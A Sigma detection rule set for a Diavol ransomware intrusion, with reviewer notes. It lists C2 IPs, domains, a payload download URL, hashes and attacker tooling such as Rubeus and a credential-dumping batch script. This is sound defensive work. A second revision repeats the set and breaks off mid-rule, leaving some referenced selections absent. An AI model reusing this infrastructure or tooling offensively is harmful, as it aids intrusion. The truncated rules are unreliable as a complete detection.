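# Sigma rule set exported from MISP event 8099 (Diavol ransomware intrusion, The DFIR Report).
# Multi-document YAML: the first document (action: global) carries metadata shared by every
# following document; each later document is one logsource-specific detection built from the
# same MISP attributes (IPs, domains, a download URL, file names, file hashes).
# NOTE(review): the tag list carries tlp:amber, which restricts redistribution of the marked
# content — confirm the marking is intended for this copy of the rule.
action: global
title: Diavol Ransomware
id: e6fedcaa-265a-4ecc-92c9-5368eba2681a
status: experimental
description: See MISP event 8099
author: The DFIR Report
level: medium
tags:
  - Bazar
  - tlp:amber
  - workflow:state="ongoing"
  - misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002"
  - misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197"
  - misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003"
  - misp-galaxy:mitre-attack-pattern="AS-REP Roasting - T1558.004"
  - misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001"
  - misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048"
  - misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002"
  - misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003"
  - misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046"
  - misp-galaxy:mitre-attack-pattern="Process Injection - T1055"
  - misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001"
  - misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002"
  - misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002"
  - misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"
  - misp-galaxy:mitre-attack-pattern="Process Discovery - T1057"
  - misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135"
  - misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482"
  - misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486"
  - misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078"
  - misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059"
  - misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003"
---
# Firewall variant: destination IP (+ port) indicators only.
logsource:
  category: firewall
detection:
  # A list under `condition` is a set of alternative conditions: each item is evaluated on
  # its own and the rule fires when any one of them matches.
  condition:
    - all of event8099attr499477mapping*
    - all of event8099attr499478mapping*
    - all of event8099attr499481mapping*
    - all of event8099attr499483mapping*
    - all of event8099attr501608mapping*
    - event8099
  # Bare IP indicator with no port constraint.
  event8099:
    dst_ip: 23.152.0.22
  # NOTE(review): ports are quoted strings; a backend that indexes dst_port as an integer
  # may not match "443"/"22" — verify the field type of the target SIEM.
  event8099attr499477mappingIPDstPort:
    dst_ip: 108.62.141.87
    dst_port: "443"
  event8099attr499478mappingIPDstPort:
    dst_ip: 23.81.246.32
    dst_port: "443"
  event8099attr499481mappingIPDstPort:
    dst_ip: 206.189.49.239
    dst_port: "443"
  event8099attr499483mappingIPDstPort:
    dst_ip: 159.223.31.75
    dst_port: "443"
  event8099attr501608mappingIPDstPort:
    dst_ip: 192.52.167.210
    dst_port: "22"
---
# Proxy variant: the IP/port indicators plus domains and the payload download URL.
logsource:
  category: proxy
detection:
  # Alternative conditions (see the firewall document): any one match fires the rule.
  condition:
    - all of event8099attr499477mapping*
    - all of event8099attr499478mapping*
    - all of event8099attr499479mapping*
    - all of event8099attr499480mapping*
    - all of event8099attr499481mapping*
    - all of event8099attr499482mapping*
    - all of event8099attr499483mapping*
    - all of event8099attr499485mapping*
    - all of event8099attr501608mapping*
    - event8099
  event8099:
    dst_ip: 23.152.0.22
  event8099attr499477mappingIPDstPort:
    dst_ip: 108.62.141.87
    dst_port: "443"
  event8099attr499478mappingIPDstPort:
    dst_ip: 23.81.246.32
    dst_port: "443"
  # Domain mappings are a list of single-field maps, i.e. URI OR referrer OR resolved name.
  event8099attr499479mappingDomain:
    - c-uri|contains: gawocag.com
    - cs-referrer|contains: gawocag.com
    - r-dns|contains: gawocag.com
  event8099attr499480mappingDomain:
    - c-uri|contains: hiduwu.com
    - cs-referrer|contains: hiduwu.com
    - r-dns|contains: hiduwu.com
  event8099attr499481mappingIPDstPort:
    dst_ip: 206.189.49.239
    dst_port: "443"
  event8099attr499482mappingDomain:
    - c-uri|contains: turkcell.info
    - cs-referrer|contains: turkcell.info
    - r-dns|contains: turkcell.info
  event8099attr499483mappingIPDstPort:
    dst_ip: 159.223.31.75
    dst_port: "443"
  # NOTE(review): exact match on the whole download URL. The r-dns entry compares a
  # hostname field against a full URL and cannot match; the c-uri/cs-referrer entries miss
  # the same link when the log stores `%21` decoded as `!`. Matching the stable
  # cid/resid/authkey parameters with |contains would be more robust.
  event8099attr499485mappingURI:
    - c-uri: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
    - cs-referrer: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
    - r-dns: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
  event8099attr501608mappingIPDstPort:
    dst_ip: 192.52.167.210
    dst_port: "22"
---
# Webserver variant: identical selections to the proxy document, different logsource.
logsource:
  category: webserver
detection:
  condition:
    - all of event8099attr499477mapping*
    - all of event8099attr499478mapping*
    - all of event8099attr499479mapping*
    - all of event8099attr499480mapping*
    - all of event8099attr499481mapping*
    - all of event8099attr499482mapping*
    - all of event8099attr499483mapping*
    - all of event8099attr499485mapping*
    - all of event8099attr501608mapping*
    - event8099
  event8099:
    dst_ip: 23.152.0.22
  event8099attr499477mappingIPDstPort:
    dst_ip: 108.62.141.87
    dst_port: "443"
  event8099attr499478mappingIPDstPort:
    dst_ip: 23.81.246.32
    dst_port: "443"
  event8099attr499479mappingDomain:
    - c-uri|contains: gawocag.com
    - cs-referrer|contains: gawocag.com
    - r-dns|contains: gawocag.com
  event8099attr499480mappingDomain:
    - c-uri|contains: hiduwu.com
    - cs-referrer|contains: hiduwu.com
    - r-dns|contains: hiduwu.com
  event8099attr499481mappingIPDstPort:
    dst_ip: 206.189.49.239
    dst_port: "443"
  event8099attr499482mappingDomain:
    - c-uri|contains: turkcell.info
    - cs-referrer|contains: turkcell.info
    - r-dns|contains: turkcell.info
  event8099attr499483mappingIPDstPort:
    dst_ip: 159.223.31.75
    dst_port: "443"
  # NOTE(review): same caveat as in the proxy document — r-dns against a full URL never
  # matches, and the exact URL is brittle against URL-decoding.
  event8099attr499485mappingURI:
    - c-uri: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
    - cs-referrer: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
    - r-dns: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
  event8099attr501608mappingIPDstPort:
    dst_ip: 192.52.167.210
    dst_port: "22"
---
# Windows endpoint variant: the network indicators on process-network fields, the file names
# of the tooling observed on the hosts, and per-sample file hashes.
logsource:
  product: windows
detection:
  # Alternative conditions; the `X and Y` items require both a file-name hit and a hash hit
  # for the same sample, the bare `event8099objectNNNNN` items fire on the hash alone.
  condition:
    - all of event8099attr499477mapping*
    - all of event8099attr499478mapping*
    - all of event8099attr499481mapping*
    - all of event8099attr499483mapping*
    - all of event8099attr501608mapping*
    - event8099
    - all of event8099attr545630mapping*
    - all of event8099attr545643mapping*
    - all of event8099attr545644mapping*
    - event8099object26050
    - event8099object26051
    - event8099object26052
    - event8099object26053
    - all of event8099object26054attr501549mapping* and event8099object26054
    - all of event8099object26055attr501555mapping* and event8099object26055
    - event8099object26056
    - all of event8099object26057attr501567mapping* and event8099object26057
    - all of event8099object26058attr501573mapping* and event8099object26058
    - all of event8099object26059attr501579mapping* and event8099object26059
    - all of event8099object26062attr501597mapping* and event8099object26062
    - event8099object26063
    - all of event8099object27480attr545636mapping*
    - all of event8099object27486attr545651mapping* and all of event8099object27486attr545652mapping*
  event8099:
    DestinationIp: 23.152.0.22
  # NOTE(review): quoted port strings — see the firewall document.
  event8099attr499477mappingIPDstPort:
    DestinationIp: 108.62.141.87
    DestinationPort: "443"
  event8099attr499478mappingIPDstPort:
    DestinationIp: 23.81.246.32
    DestinationPort: "443"
  event8099attr499481mappingIPDstPort:
    DestinationIp: 206.189.49.239
    DestinationPort: "443"
  event8099attr499483mappingIPDstPort:
    DestinationIp: 159.223.31.75
    DestinationPort: "443"
  event8099attr501608mappingIPDstPort:
    DestinationIp: 192.52.167.210
    DestinationPort: "22"
  # Filename mappings list every process field the generator emits: presumably the Sysmon
  # names (Image/ParentImage/CommandLine) and a non-Sysmon ProcessName/ParentProcessName
  # pair — confirm against the field mapping of the target backend. The bare ProcessName
  # entries are exact matches on a file name and will not hit a field holding a full path.
  event8099attr545630mappingFilename:
    - Image|endswith: sqlcmd.exe
    - ParentImage|endswith: sqlcmd.exe
    - CommandLine|contains: sqlcmd.exe
    - ParentCommandLine|contains: sqlcmd.exe
    - ProcessName: sqlcmd.exe
    - ParentProcessName: sqlcmd.exe
  # NOTE(review): a DLL is never a process image, so the Image/ProcessName entries cannot
  # match; on Sysmon this indicator belongs in an image-load selection (ImageLoaded|endswith).
  # Only the CommandLine entries have a realistic chance of hitting.
  event8099attr545643mappingFilename:
    - Image|endswith: tfpkuengdlu.dll
    - ParentImage|endswith: tfpkuengdlu.dll
    - CommandLine|contains: tfpkuengdlu.dll
    - ParentCommandLine|contains: tfpkuengdlu.dll
    - ProcessName: tfpkuengdlu.dll
    - ParentProcessName: tfpkuengdlu.dll
  # NOTE(review): same DLL caveat as above.
  event8099attr545644mappingFilename:
    - Image|endswith: uvvfvnnswte.dll
    - ParentImage|endswith: uvvfvnnswte.dll
    - CommandLine|contains: uvvfvnnswte.dll
    - ParentCommandLine|contains: uvvfvnnswte.dll
    - ProcessName: uvvfvnnswte.dll
    - ParentProcessName: uvvfvnnswte.dll
  # Each event8099objectNNNNN selection lists the MD5, SHA1 and SHA256 of one sample;
  # Hashes|contains matches when any of the three appears in the (presumably Sysmon-style,
  # composite) Hashes field — confirm the backend populates that field.
  event8099object26050:
    Hashes|contains:
      - ae0ecfddce57c8f966c5ce2e448a39ba
      - 93de6401b68303f5acf7745187dbe6e8ade26a01
      - 2a0a114a95f373ac8ce52d2d83f3fb33da987e33db604d7e6431b98b7f006c5b
  event8099object26051:
    Hashes|contains:
      - 4d8af5ba95aa23f7162b7bbf8622d801
      - d5b8c1a219686be5b75e58c560609023b491d9aa
      - e87f9f378590b95de1b1ef2aaab84e1d00f210fd6aaf5025d815f33096c9d162
  event8099object26052:
    Hashes|contains:
      - fb88f4d22f14ca09ddeeca5d312f4d9f
      - 734205a694689db504418101b91c9981e3a12deb
      - c17e71c7ae15fdb02a4e22df4f50fb44215211755effd6e3fc56e7f3e586b299
  event8099object26053:
    Hashes|contains:
      - 9b02dd2a1a15e94922be3f85129083ac
      - 2cb6ff75b38a3f24f3b60a2742b6f4d6027f0f2a
      - b1102ed4bca6dae6f2f498ade2f73f76af527fa803f0e0b46e100d4cf5150682
  event8099object26054:
    Hashes|contains:
      - 6798ff540f3d077c3cda2f5a4a8559f7
      - 40e8b04603f168b034c322be6c8b0afa5a9e89ac
      - 0e09068581f6ed53d15d34fff9940dfc7ad224e3ce38ac8d1ca1057aee3e3feb
  event8099object26054attr501549mappingFilename:
    - Image|endswith: Rubeus.exe
    - ParentImage|endswith: Rubeus.exe
    - CommandLine|contains: Rubeus.exe
    - ParentCommandLine|contains: Rubeus.exe
    - ProcessName: Rubeus.exe
    - ParentProcessName: Rubeus.exe
  event8099object26055:
    Hashes|contains:
      - 69c68c62844966115c13dfee2e7bc58c
      - 7f49ecaebe1c59c09587cee25fb8844c78a78665
      - 5551fb5702220dfc05e0811b7c91e149c21ec01e8ca210d1602e32dece1e464d
  # NOTE(review): DLL name in process-image fields — see event8099attr545643mappingFilename.
  event8099object26055attr501555mappingFilename:
    - Image|endswith: uvvfvnnswte.dll
    - ParentImage|endswith: uvvfvnnswte.dll
    - CommandLine|contains: uvvfvnnswte.dll
    - ParentCommandLine|contains: uvvfvnnswte.dll
    - ProcessName: uvvfvnnswte.dll
    - ParentProcessName: uvvfvnnswte.dll
  event8099object26056:
    Hashes|contains:
      - 56c552097559ecbafedd5683038ca480
      - dc0699b1d1c5a99b75334b69dafce5fe86bcf6a3
      - 493a1fbe833c419b37bb345f6f193517d5d9fd2577f09cc74b48b49d7d732a54
  event8099object26057:
    Hashes|contains:
      - 1e81900cc66fde050aef4c3149f1a375
      - f334b1b95f315f994c82da572e7acb68df4b17ed
      - 9809bc0bea9bbfe31d47210391b124a724288b061d44dee5edc5e2582e36b271
  # NOTE(review): a .bat runs under cmd.exe, so Image/ProcessName never end with the script
  # name; only the CommandLine entries can hit.
  event8099object26057attr501567mappingFilename:
    - Image|endswith: fodhelper_reg_hashes.bat
    - ParentImage|endswith: fodhelper_reg_hashes.bat
    - CommandLine|contains: fodhelper_reg_hashes.bat
    - ParentCommandLine|contains: fodhelper_reg_hashes.bat
    - ProcessName: fodhelper_reg_hashes.bat
    - ParentProcessName: fodhelper_reg_hashes.bat
  event8099object26058:
    Hashes|contains:
      - e63eff806ef5a7d04dabad6e59e88e3a
      - 4d7102f088c73eb91213f6950f0d334157557fce
      - 452d7485ae47f431c6c4dc2ce1f021e61cd939b4a3f51b01e15d03dcd4de8ef2
  # NOTE(review): the ransom note is a written file, not a process; the process-image
  # entries cannot match it. A file-creation selection (Sysmon TargetFilename|endswith)
  # would be the useful field for this indicator.
  event8099object26058attr501573mappingFilename:
    - Image|endswith: README_FOR_DECRYPT.txt
    - ParentImage|endswith: README_FOR_DECRYPT.txt
    - CommandLine|contains: README_FOR_DECRYPT.txt
    - ParentCommandLine|contains: README_FOR_DECRYPT.txt
    - ProcessName: README_FOR_DECRYPT.txt
    - ParentProcessName: README_FOR_DECRYPT.txt
  event8099object26059:
    Hashes|contains:
      - e6bef068c93cacdae7f15eded63461da
      - 0390eacb29a580adf9870dbd3412f91d984a3197
      - bc88ae2c3353ee858a0dcdcd087bcd55f3c7eab0c702f7b295d2836565073730
  event8099object26059attr501579mappingFilename:
    - Image|endswith: MSSQLUDPScanner.exe
    - ParentImage|endswith: MSSQLUDPScanner.exe
    - CommandLine|contains: MSSQLUDPScanner.exe
    - ParentCommandLine|contains: MSSQLUDPScanner.exe
    - ProcessName: MSSQLUDPScanner.exe
    - ParentProcessName: MSSQLUDPScanner.exe
  event8099object26062:
    Hashes|contains:
      - 32d6f85c93bad9fa0f3eda1a8e800160
      - 6e7628cd11dc76835e8cc0b2a91dc38101fcdb90
      - 07f4a329f280d2896e1211ea79c73132be3a44e6c88819dea194e582bac18b3d
  event8099object26062attr501597mappingFilename:
    - Image|endswith: veeam1.cs.exe
    - ParentImage|endswith: veeam1.cs.exe
    - CommandLine|contains: veeam1.cs.exe
    - ParentCommandLine|contains: veeam1.cs.exe
    - ProcessName: veeam1.cs.exe
    - ParentProcessName: veeam1.cs.exe
  event8099object26063:
    Hashes|contains:
      - e5f3cea83f3aa86fc4766c8061a8f3ec
      - 77b238f5755940fbdc85a8f88a841e73cbe240e5
      - a05888cf9ee72435f502a4cd41e0733fb30b37192db32fb0c33675c2b7acccde
  # NOTE(review): duplicates the fodhelper_reg_hashes.bat name check of
  # event8099object26057attr501567mappingFilename, but without the hash constraint, so the
  # weaker name-only match already fires on its own.
  event8099object27480attr545636mappingFilename:
    - Image|endswith: fodhelper_reg_hashes.bat
    - ParentImage|endswith: fodhelper_reg_hashes.bat
    - CommandLine|contains: fodhelper_reg_hashes.bat
    - ParentCommandLine|contains: fodhelper_reg_hashes.bat
    - ProcessName: fodhelper_reg_hashes.bat
    - ParentProcessName: fodhelper_reg_hashes.bat
  # NOTE(review): the last condition item ANDs the cmd.exe and more.exe mappings; since each
  # mapping also accepts the parent fields, any cmd.exe -> more.exe pair (or more.exe -> cmd.exe)
  # satisfies it. Expect a high false-positive rate without a further constraint.
  event8099object27486attr545651mappingFilename:
    - Image|endswith: cmd.exe
    - ParentImage|endswith: cmd.exe
    - CommandLine|contains: cmd.exe
    - ParentCommandLine|contains: cmd.exe
    - ProcessName: cmd.exe
    - ParentProcessName: cmd.exe
  event8099object27486attr545652mappingFilename:
    - Image|endswith: more.exe
    - ParentImage|endswith: more.exe
    - CommandLine|contains: more.exe
    - ParentCommandLine|contains: more.exe
    - ProcessName: more.exe
    - ParentProcessName: more.exe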
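# Sigma rule set exported from MISP event 8099 (Diavol ransomware intrusion, The DFIR Report).
# Multi-document YAML: the first document (action: global) carries metadata shared by every
# following document; each later document is one logsource-specific detection built from the
# same MISP attributes (IPs, domains, a download URL, file names, file hashes, command lines).
# NOTE(review): the tag list carries tlp:amber, which restricts redistribution of the marked
# content — confirm the marking is intended for this copy of the rule.
action: global
title: Diavol Ransomware
id: e6fedcaa-265a-4ecc-92c9-5368eba2681a
status: experimental
description: See MISP event 8099
author: The DFIR Report
level: medium
tags:
  - Bazar
  - tlp:amber
  - workflow:state="ongoing"
  - misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002"
  - misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197"
  - misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003"
  - misp-galaxy:mitre-attack-pattern="AS-REP Roasting - T1558.004"
  - misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001"
  - misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048"
  - misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002"
  - misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003"
  - misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046"
  - misp-galaxy:mitre-attack-pattern="Process Injection - T1055"
  - misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001"
  - misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002"
  - misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002"
  - misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"
  - misp-galaxy:mitre-attack-pattern="Process Discovery - T1057"
  - misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135"
  - misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482"
  - misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486"
  - misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078"
  - misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059"
  - misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003"
---
# Firewall variant: destination IP (+ port) indicators only.
logsource:
  category: firewall
detection:
  # A list under `condition` is a set of alternative conditions: each item is evaluated on
  # its own and the rule fires when any one of them matches.
  condition:
    - all of event8099attr499477mapping*
    - all of event8099attr499478mapping*
    - all of event8099attr499481mapping*
    - all of event8099attr499483mapping*
    - all of event8099attr501608mapping*
    - event8099
  # Bare IP indicator with no port constraint.
  event8099:
    dst_ip: 23.152.0.22
  # NOTE(review): ports are quoted strings; a backend that indexes dst_port as an integer
  # may not match "443"/"22" — verify the field type of the target SIEM.
  event8099attr499477mappingIPDstPort:
    dst_ip: 108.62.141.87
    dst_port: "443"
  event8099attr499478mappingIPDstPort:
    dst_ip: 23.81.246.32
    dst_port: "443"
  event8099attr499481mappingIPDstPort:
    dst_ip: 206.189.49.239
    dst_port: "443"
  event8099attr499483mappingIPDstPort:
    dst_ip: 159.223.31.75
    dst_port: "443"
  event8099attr501608mappingIPDstPort:
    dst_ip: 192.52.167.210
    dst_port: "22"
---
# Proxy variant: the IP/port indicators plus domains and the payload download URL.
logsource:
  category: proxy
detection:
  # Alternative conditions (see the firewall document): any one match fires the rule.
  condition:
    - all of event8099attr499477mapping*
    - all of event8099attr499478mapping*
    - all of event8099attr499479mapping*
    - all of event8099attr499480mapping*
    - all of event8099attr499481mapping*
    - all of event8099attr499482mapping*
    - all of event8099attr499483mapping*
    - all of event8099attr499485mapping*
    - all of event8099attr501608mapping*
    - event8099
  event8099:
    dst_ip: 23.152.0.22
  event8099attr499477mappingIPDstPort:
    dst_ip: 108.62.141.87
    dst_port: "443"
  event8099attr499478mappingIPDstPort:
    dst_ip: 23.81.246.32
    dst_port: "443"
  # Domain mappings are a list of single-field maps, i.e. URI OR referrer OR resolved name.
  event8099attr499479mappingDomain:
    - c-uri|contains: gawocag.com
    - cs-referrer|contains: gawocag.com
    - r-dns|contains: gawocag.com
  event8099attr499480mappingDomain:
    - c-uri|contains: hiduwu.com
    - cs-referrer|contains: hiduwu.com
    - r-dns|contains: hiduwu.com
  event8099attr499481mappingIPDstPort:
    dst_ip: 206.189.49.239
    dst_port: "443"
  event8099attr499482mappingDomain:
    - c-uri|contains: turkcell.info
    - cs-referrer|contains: turkcell.info
    - r-dns|contains: turkcell.info
  event8099attr499483mappingIPDstPort:
    dst_ip: 159.223.31.75
    dst_port: "443"
  # NOTE(review): exact match on the whole download URL. The r-dns entry compares a
  # hostname field against a full URL and cannot match; the c-uri/cs-referrer entries miss
  # the same link when the log stores `%21` decoded as `!`. Matching the stable
  # cid/resid/authkey parameters with |contains would be more robust.
  event8099attr499485mappingURI:
    - c-uri: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
    - cs-referrer: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
    - r-dns: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
  event8099attr501608mappingIPDstPort:
    dst_ip: 192.52.167.210
    dst_port: "22"
---
# Webserver variant: identical selections to the proxy document, different logsource.
logsource:
  category: webserver
detection:
  condition:
    - all of event8099attr499477mapping*
    - all of event8099attr499478mapping*
    - all of event8099attr499479mapping*
    - all of event8099attr499480mapping*
    - all of event8099attr499481mapping*
    - all of event8099attr499482mapping*
    - all of event8099attr499483mapping*
    - all of event8099attr499485mapping*
    - all of event8099attr501608mapping*
    - event8099
  event8099:
    dst_ip: 23.152.0.22
  event8099attr499477mappingIPDstPort:
    dst_ip: 108.62.141.87
    dst_port: "443"
  event8099attr499478mappingIPDstPort:
    dst_ip: 23.81.246.32
    dst_port: "443"
  event8099attr499479mappingDomain:
    - c-uri|contains: gawocag.com
    - cs-referrer|contains: gawocag.com
    - r-dns|contains: gawocag.com
  event8099attr499480mappingDomain:
    - c-uri|contains: hiduwu.com
    - cs-referrer|contains: hiduwu.com
    - r-dns|contains: hiduwu.com
  event8099attr499481mappingIPDstPort:
    dst_ip: 206.189.49.239
    dst_port: "443"
  event8099attr499482mappingDomain:
    - c-uri|contains: turkcell.info
    - cs-referrer|contains: turkcell.info
    - r-dns|contains: turkcell.info
  event8099attr499483mappingIPDstPort:
    dst_ip: 159.223.31.75
    dst_port: "443"
  # NOTE(review): same caveat as in the proxy document — r-dns against a full URL never
  # matches, and the exact URL is brittle against URL-decoding.
  event8099attr499485mappingURI:
    - c-uri: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
    - cs-referrer: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
    - r-dns: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
  event8099attr501608mappingIPDstPort:
    dst_ip: 192.52.167.210
    dst_port: "22"
---
# Windows endpoint variant: the network indicators on process-network fields, the file names
# of the tooling observed on the hosts, per-sample file hashes, and the command lines seen
# during the intrusion (objects 27478-27486).
logsource:
  product: windows
detection:
  # Alternative conditions; the `X and Y` items require both a file-name hit and a hash hit
  # for the same sample, the bare `event8099objectNNNNN` items fire on their own selection.
  condition:
    - all of event8099attr499477mapping*
    - all of event8099attr499478mapping*
    - all of event8099attr499481mapping*
    - all of event8099attr499483mapping*
    - all of event8099attr501608mapping*
    - event8099
    - all of event8099attr545630mapping*
    - all of event8099attr545643mapping*
    - all of event8099attr545644mapping*
    - event8099object26050
    - event8099object26051
    - event8099object26052
    - event8099object26053
    - all of event8099object26054attr501549mapping* and event8099object26054
    - all of event8099object26055attr501555mapping* and event8099object26055
    - event8099object26056
    - all of event8099object26057attr501567mapping* and event8099object26057
    - all of event8099object26058attr501573mapping* and event8099object26058
    - all of event8099object26059attr501579mapping* and event8099object26059
    - all of event8099object26062attr501597mapping* and event8099object26062
    - event8099object26063
    - event8099object27478
    - event8099object27479
    - all of event8099object27480attr545636mapping*
    - event8099object27481
    - event8099object27482
    - event8099object27483
    - event8099object27484
    - event8099object27485
    - event8099object27486
  event8099:
    DestinationIp: 23.152.0.22
  # NOTE(review): quoted port strings — see the firewall document.
  event8099attr499477mappingIPDstPort:
    DestinationIp: 108.62.141.87
    DestinationPort: "443"
  event8099attr499478mappingIPDstPort:
    DestinationIp: 23.81.246.32
    DestinationPort: "443"
  event8099attr499481mappingIPDstPort:
    DestinationIp: 206.189.49.239
    DestinationPort: "443"
  event8099attr499483mappingIPDstPort:
    DestinationIp: 159.223.31.75
    DestinationPort: "443"
  event8099attr501608mappingIPDstPort:
    DestinationIp: 192.52.167.210
    DestinationPort: "22"
  # Filename mappings list every process field the generator emits: presumably the Sysmon
  # names (Image/ParentImage/CommandLine) and a non-Sysmon ProcessName/ParentProcessName
  # pair — confirm against the field mapping of the target backend. The bare ProcessName
  # entries are exact matches on a file name and will not hit a field holding a full path.
  event8099attr545630mappingFilename:
    - Image|endswith: sqlcmd.exe
    - ParentImage|endswith: sqlcmd.exe
    - CommandLine|contains: sqlcmd.exe
    - ParentCommandLine|contains: sqlcmd.exe
    - ProcessName: sqlcmd.exe
    - ParentProcessName: sqlcmd.exe
  # NOTE(review): a DLL is never a process image, so the Image/ProcessName entries cannot
  # match; on Sysmon this indicator belongs in an image-load selection (ImageLoaded|endswith).
  # Only the CommandLine entries have a realistic chance of hitting.
  event8099attr545643mappingFilename:
    - Image|endswith: tfpkuengdlu.dll
    - ParentImage|endswith: tfpkuengdlu.dll
    - CommandLine|contains: tfpkuengdlu.dll
    - ParentCommandLine|contains: tfpkuengdlu.dll
    - ProcessName: tfpkuengdlu.dll
    - ParentProcessName: tfpkuengdlu.dll
  # NOTE(review): same DLL caveat as above.
  event8099attr545644mappingFilename:
    - Image|endswith: uvvfvnnswte.dll
    - ParentImage|endswith: uvvfvnnswte.dll
    - CommandLine|contains: uvvfvnnswte.dll
    - ParentCommandLine|contains: uvvfvnnswte.dll
    - ProcessName: uvvfvnnswte.dll
    - ParentProcessName: uvvfvnnswte.dll
  # Each event8099objectNNNNN selection lists the MD5, SHA1 and SHA256 of one sample;
  # Hashes|contains matches when any of the three appears in the (presumably Sysmon-style,
  # composite) Hashes field — confirm the backend populates that field.
  event8099object26050:
    Hashes|contains:
      - ae0ecfddce57c8f966c5ce2e448a39ba
      - 93de6401b68303f5acf7745187dbe6e8ade26a01
      - 2a0a114a95f373ac8ce52d2d83f3fb33da987e33db604d7e6431b98b7f006c5b
  event8099object26051:
    Hashes|contains:
      - 4d8af5ba95aa23f7162b7bbf8622d801
      - d5b8c1a219686be5b75e58c560609023b491d9aa
      - e87f9f378590b95de1b1ef2aaab84e1d00f210fd6aaf5025d815f33096c9d162
  event8099object26052:
    Hashes|contains:
      - fb88f4d22f14ca09ddeeca5d312f4d9f
      - 734205a694689db504418101b91c9981e3a12deb
      - c17e71c7ae15fdb02a4e22df4f50fb44215211755effd6e3fc56e7f3e586b299
  event8099object26053:
    Hashes|contains:
      - 9b02dd2a1a15e94922be3f85129083ac
      - 2cb6ff75b38a3f24f3b60a2742b6f4d6027f0f2a
      - b1102ed4bca6dae6f2f498ade2f73f76af527fa803f0e0b46e100d4cf5150682
  event8099object26054:
    Hashes|contains:
      - 6798ff540f3d077c3cda2f5a4a8559f7
      - 40e8b04603f168b034c322be6c8b0afa5a9e89ac
      - 0e09068581f6ed53d15d34fff9940dfc7ad224e3ce38ac8d1ca1057aee3e3feb
  # Object-level filename mappings in this revision use a two-entry form:
  # Image suffix OR ProcessName substring.
  event8099object26054attr501549mappingFilename:
    - Image|endswith: Rubeus.exe
    - ProcessName|contains: Rubeus.exe
  event8099object26055:
    Hashes|contains:
      - 69c68c62844966115c13dfee2e7bc58c
      - 7f49ecaebe1c59c09587cee25fb8844c78a78665
      - 5551fb5702220dfc05e0811b7c91e149c21ec01e8ca210d1602e32dece1e464d
  # NOTE(review): DLL name in process-image fields — see event8099attr545643mappingFilename.
  # With no CommandLine entry here, this mapping is unlikely to match on process events.
  event8099object26055attr501555mappingFilename:
    - Image|endswith: uvvfvnnswte.dll
    - ProcessName|contains: uvvfvnnswte.dll
  event8099object26056:
    Hashes|contains:
      - 56c552097559ecbafedd5683038ca480
      - dc0699b1d1c5a99b75334b69dafce5fe86bcf6a3
      - 493a1fbe833c419b37bb345f6f193517d5d9fd2577f09cc74b48b49d7d732a54
  event8099object26057:
    Hashes|contains:
      - 1e81900cc66fde050aef4c3149f1a375
      - f334b1b95f315f994c82da572e7acb68df4b17ed
      - 9809bc0bea9bbfe31d47210391b124a724288b061d44dee5edc5e2582e36b271
  # NOTE(review): a .bat runs under cmd.exe, so Image never ends with the script name;
  # a CommandLine|contains entry would be the field that can hit.
  event8099object26057attr501567mappingFilename:
    - Image|endswith: fodhelper_reg_hashes.bat
    - ProcessName|contains: fodhelper_reg_hashes.bat
  event8099object26058:
    Hashes|contains:
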